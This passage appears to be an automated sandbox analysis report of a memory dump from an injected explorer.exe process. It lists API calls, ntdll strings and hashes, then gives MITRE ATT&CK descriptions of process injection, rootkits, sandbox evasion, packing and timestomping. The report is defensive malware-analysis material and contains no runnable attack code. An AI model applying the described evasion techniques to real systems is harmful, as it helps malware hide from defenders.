
Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 030DA734

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 5a506e35a4d936a7ddf51386943b1dd19ed8e6a4ebfc7ea7a7855876736d89d2
Instruction ID: f9d59cb9bc65c1be70619f3c8fb16507def34947656693139b437c52d1bdab8b
Opcode Fuzzy Hash: 5a506e35a4d936a7ddf51386943b1dd19ed8e6a4ebfc7ea7a7855876736d89d2
Instruction Fuzzy Hash: AEE086F66151057F9704EEA5EC90CAB77EDDF98641704890DF59AC3148C53094128760

Uniqueness

Uniqueness Score: -1.00%

Function 030DA7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,030CF1D2,030CF1D2,?,00000000,?,?), ref: 030DA800

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 21bcbc242606cd1a5dd6cee553abe8501175cfbcb24e6b6aa7ebce165397725e
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 99E01AB52003086BDB10DF89CC84EE737ADEF89650F118154BA085B241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 030DA630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(030D4536,?,030D4CAF,030D4CAF,?,030D4536,?,?,?,?,?,00000000,00000000,?), ref: 030DA65D

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: ccbffa45333c08c548a72d589f92996b898d7c148478898e02c4dbc4e83a7d4b
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: FCE012B5200308ABDB14EF99CC40EA777ACEF88654F158598BA085B241C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 030CF6C7 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,030C8D14,?), ref: 030CF6FB

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 6f82875f8e26f4e740030d6d48b9401f4c802c7c6bdbf1cde5ae4146709853dc
Instruction ID: f4ff0550bff8123a3df9cb8bbd4b6062df9f9be2f57111888915e624519b5ffc
Opcode Fuzzy Hash: 6f82875f8e26f4e740030d6d48b9401f4c802c7c6bdbf1cde5ae4146709853dc
Instruction Fuzzy Hash: 54D05E766D03053BFA10EAE5DC06FA627CA6F55A44F6A0078F94DEB3C3D961E4018522

Uniqueness

Uniqueness Score: -1.00%

Function 030CF6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,030C8D14,?), ref: 030CF6FB

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction ID: 2f6fc7b6a5488ccda4d2999e2d453eabfe590745ee29654140264b4a0b6ebeb3
Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction Fuzzy Hash: 12D05E656503093AE610EAA59C02F6672C95B44A04F490064F9489A2C3DD60E0004165

Uniqueness

Uniqueness Score: -1.00%

Function 051B2BCA Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 051B2BE4

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fc2400fbec12a48ee98f0eafe56d6b7b8ac6d2c2b8a10157ce692c9dfa16e751
Instruction ID: d22be3bf83a19d727f2dc46b8071ba561992e9cfcb599998efa1191ad0521ecf
Opcode Fuzzy Hash: fc2400fbec12a48ee98f0eafe56d6b7b8ac6d2c2b8a10157ce692c9dfa16e751
Instruction Fuzzy Hash: 1DB02B32C010C0C5E610D7200748B173D1077D0300F11C051D1030250E073CC0C0E132

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 051B2850 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 051B28FC
___swprintf_l.LIBCMT ref: 051B291E
___swprintf_l.LIBCMT ref: 051B2963
___swprintf_l.LIBCMT ref: 051EA414

Strings

ffff:, xrefs: 051EA3EA
::ffff:0:%u.%u.%u.%u, xrefs: 051EA434
:%u.%u.%u.%u, xrefs: 051EA49E
::%hs%u.%u.%u.%u, xrefs: 051EA40D

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: ccf21e4de53d7c5c2825c3e65cddd26c8e96f9a0d401efc0c65ff1cca15a2907
Instruction ID: a173c0ab2abae8600d6071551a56cf73d55b06f87be24dee6b9e6773927e384d
Opcode Fuzzy Hash: ccf21e4de53d7c5c2825c3e65cddd26c8e96f9a0d401efc0c65ff1cca15a2907
Instruction Fuzzy Hash: 1B5134B9E00516BFDB20DB98C8949BEFBF9BF08240B548269E469D3641D374DE54C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 052220E0 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 05222176
___swprintf_l.LIBCMT ref: 052221B2
___swprintf_l.LIBCMT ref: 0522224D
___swprintf_l.LIBCMT ref: 05222273
___swprintf_l.LIBCMT ref: 05222298
___swprintf_l.LIBCMT ref: 052222D8

Strings

ffff:, xrefs: 0522214D, 0522216D
:%u.%u.%u.%u, xrefs: 052222CF
::%hs%u.%u.%u.%u, xrefs: 0522216E
::ffff:0:%u.%u.%u.%u, xrefs: 052221AA

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 3826a9787000095228b61088afcce731015dc419bf464a1220aee8515e5902a6
Instruction ID: c6a7ef0e81e64188f3baff3a7566ab41493ec12d7eec3ea8af76e0509a4daae4
Opcode Fuzzy Hash: 3826a9787000095228b61088afcce731015dc419bf464a1220aee8515e5902a6
Instruction Fuzzy Hash: 0B51067DA10666FECB20DF9DC880D7FB7F9AF44200704855DE5A9D7242D6B6DA008B60

Uniqueness

Uniqueness Score: -1.00%

Function 051A75F0 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 051E45E2
Execute=1, xrefs: 051E45F9
ExecuteOptions, xrefs: 051E4586
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 051E460B
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 051E4628
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 051E453B
CLIENT(ntdll): Processing section info %ws..., xrefs: 051E466D

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 98e944f4577c517ff791b7d44864d5a3de82ba2f34247e0ffca09fba8120a479
Instruction ID: 971b722890ae1b5500b3afb6f6656ccbe3c08e49477f88fb344255086c951d63
Opcode Fuzzy Hash: 98e944f4577c517ff791b7d44864d5a3de82ba2f34247e0ffca09fba8120a479
Instruction Fuzzy Hash: 54510776700219BAEF26EAA4DC49FE973A9EF48300F140199E50AA71C1DBB09F45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05246600 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a656f7b237b6c7dc51ada09d2ac08d484b713800fb41be17a573fe29c41fbb6d
Instruction ID: c47f414bfdab3729c20ee3f7a1c23123f5bd215103c662438f6cc953229ee017
Opcode Fuzzy Hash: a656f7b237b6c7dc51ada09d2ac08d484b713800fb41be17a573fe29c41fbb6d
Instruction Fuzzy Hash: A3021371618342AFD309CF28C484A6AB7E5FFC9700F14892DF9999B264DB71E905CF52

Uniqueness

Uniqueness Score: -1.00%

Function 051BB5CC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 051BB69F

Strings

0, xrefs: 051BB64F
-, xrefs: 051BB630
0, xrefs: 051BB675
+, xrefs: 051BB63A

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: f27c141a2fe010a203261d3bccd99e79c43666395aaab80e9f661fec1c1263ad
Instruction ID: 58870b811119c7eb246c70177dc504902de5f18293d25bde32cce04f60c9e004
Opcode Fuzzy Hash: f27c141a2fe010a203261d3bccd99e79c43666395aaab80e9f661fec1c1263ad
Instruction Fuzzy Hash: E681D470E0D2499FFB28EE68C851BFE7BB2BF45310F184159D492A7AD1C7B48840CB64

Uniqueness

Uniqueness Score: -1.00%

Function 05221DB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 05221E1F
___swprintf_l.LIBCMT ref: 05221E42

Strings

[, xrefs: 05221DFB
%%%u, xrefs: 05221E16
]:%u, xrefs: 05221E39

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: f48d42f25f390d28f178f8be23fa274132c3fa3241003286dcd62b1dbaeb149e
Instruction ID: 136ee5f35360c596902b728067bb1905936dff468b8ec571b012465a9010f220
Opcode Fuzzy Hash: f48d42f25f390d28f178f8be23fa274132c3fa3241003286dcd62b1dbaeb149e
Instruction Fuzzy Hash: EE21957AA1012AABDB10DF79CC44DFFBBF8EF58640B440515E815D3241EB70D911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0519F560 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 051E01CD
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 051E01A3
RTL: Re-Waiting, xrefs: 051E0204

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 111e35a9478437203c242d50cce27d082db5d91d4c1fb8494263a013d1106b73
Instruction ID: 1bf9129b134ae2128531487f7571cc1363f78bad999cbc1427de5701a5ff3beb
Opcode Fuzzy Hash: 111e35a9478437203c242d50cce27d082db5d91d4c1fb8494263a013d1106b73
Instruction Fuzzy Hash: 8FE1B131608741AFDB2ACF28C888B66B7E1BF48314F144A1DF5A6CB2D1D7B4E945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 051ABE90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 051E7A65
RTL: Resource at %p, xrefs: 051E7A74
RTL: Re-Waiting, xrefs: 051E7A92

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 5a14c6b139694ab22e89f2d719164dec7d9f1e60636e11b1c3c0e641f9bd738a
Instruction ID: 246c1e090a90337376829ddc755eb8655aa7d63e726fea44780bbd92b67d7d47
Opcode Fuzzy Hash: 5a14c6b139694ab22e89f2d719164dec7d9f1e60636e11b1c3c0e641f9bd738a
Instruction Fuzzy Hash: 144145363087829FD725CE28C841F6BB7E6FF88720F140A1DE95A97681DB71F9058B91

Uniqueness

Uniqueness Score: -1.00%

Function 051AB480 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 051E7172

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 051E717A
RTL: Resource at %p, xrefs: 051E7189
RTL: Re-Waiting, xrefs: 051E71A7

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: e3a17d00d8ee189434d55844e0a6ad7ac34649271e0c95a2b69f720aa31fbbaa
Instruction ID: 9936aa399802cc477349aaae0d87a75cc09638957af033864ea4d5c4f7fa2065
Opcode Fuzzy Hash: e3a17d00d8ee189434d55844e0a6ad7ac34649271e0c95a2b69f720aa31fbbaa
Instruction Fuzzy Hash: 5D41E236708786AFE725DF24CC40FA6B7A6FF84720F110A19E956DB280DB31E8459BD1

Uniqueness

Uniqueness Score: -1.00%

Function 05221FD0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0522205D
___swprintf_l.LIBCMT ref: 05222083

Strings

%%%u, xrefs: 05222054
]:%u, xrefs: 0522207A

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 73e20257f74a8e0822de1c135dadf0bbe271775f3c9a80b35611699aac365fc6
Instruction ID: 157114113194ae4cfe7763cd8acf766e3f60ae5755dc739df7a545404506c210
Opcode Fuzzy Hash: 73e20257f74a8e0822de1c135dadf0bbe271775f3c9a80b35611699aac365fc6
Instruction Fuzzy Hash: 0F318779610129EEDB20DE28CC44BFEB7B8FF54640F444555E84AD3140EB719A54CB62

Uniqueness

Uniqueness Score: -1.00%

Function 051B7D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 051B7E6B

Strings

-, xrefs: 051B7DBD
+, xrefs: 051B7DC8

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 32ee4bbd0ed843b8f8209885f148ce58b1a7ef103e8175f3e36e08e3e949613a
Instruction ID: 64c59fb6b7307f5bbdcc4359965a6e1260efd0c297312fc749a2bd4096dc6927
Opcode Fuzzy Hash: 32ee4bbd0ed843b8f8209885f148ce58b1a7ef103e8175f3e36e08e3e949613a
Instruction Fuzzy Hash: 95918470E0420A9EFB28DE69C881AFEB7B6FFC4760F14451EE865E72C0D7B499818754

Uniqueness

Uniqueness Score: -1.00%

Function 05179086 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 051790F1
@, xrefs: 051790D5

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 37ae2eb7674a664bf9b3f8ba4b4be4d87253bea42d381720bf2c5f0ff479d812
Instruction ID: 2d85ab53ea5cf2414e1a0447861932503ba4718ffb606fa53858a2dc27ec8f97
Opcode Fuzzy Hash: 37ae2eb7674a664bf9b3f8ba4b4be4d87253bea42d381720bf2c5f0ff479d812
Instruction Fuzzy Hash: A5814975D002699BDB35DB54CC49BEEB7B9AF48750F0041EAE91AB7280D7709E84CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 051FCB70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 051FCC8D

Strings

@4Ew@4Ew, xrefs: 051FCCA5, 051FCCAA, 051FCCC1
@, xrefs: 051FCBDA

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Ew@4Ew
API String ID: 4062629308-954339963
Opcode ID: 80c4a1e9e9221c7035ea11a86feb25d5f9721b92497ef9e0c503fbc428e068f7
Instruction ID: d0cb4e0f31243c4c03cef8a4c4e486f54c7b0beed56b7a5005118324858d0c2a
Opcode Fuzzy Hash: 80c4a1e9e9221c7035ea11a86feb25d5f9721b92497ef9e0c503fbc428e068f7
Instruction Fuzzy Hash: 4941DE75A04218DFDB21EFA8D845AAEFBF9FF55B18F00442AE901DB251D7748C40EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05170485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

RtlGetReturnAddressHijackTarget.NTDLL ref: 05170504

Strings

kLsE, xrefs: 051704E0
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 051705E3

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: AddressHijackReturnTarget
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 806345674-2547482624
Opcode ID: 131faf32a102f3c8626e3d057e07a609b532fb8eed95b7c8fb1579adbeae0d69
Instruction ID: 40715d087673cf74b8c81dd18b3c517cc6129c1b49ef7403fe37cbb51cd1cb99
Opcode Fuzzy Hash: 131faf32a102f3c8626e3d057e07a609b532fb8eed95b7c8fb1579adbeae0d69
Instruction Fuzzy Hash: F1519B7160470A9FD724EF29C448AA7B7F9BF88700F10892DE5AAC7241E774E505CF96

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
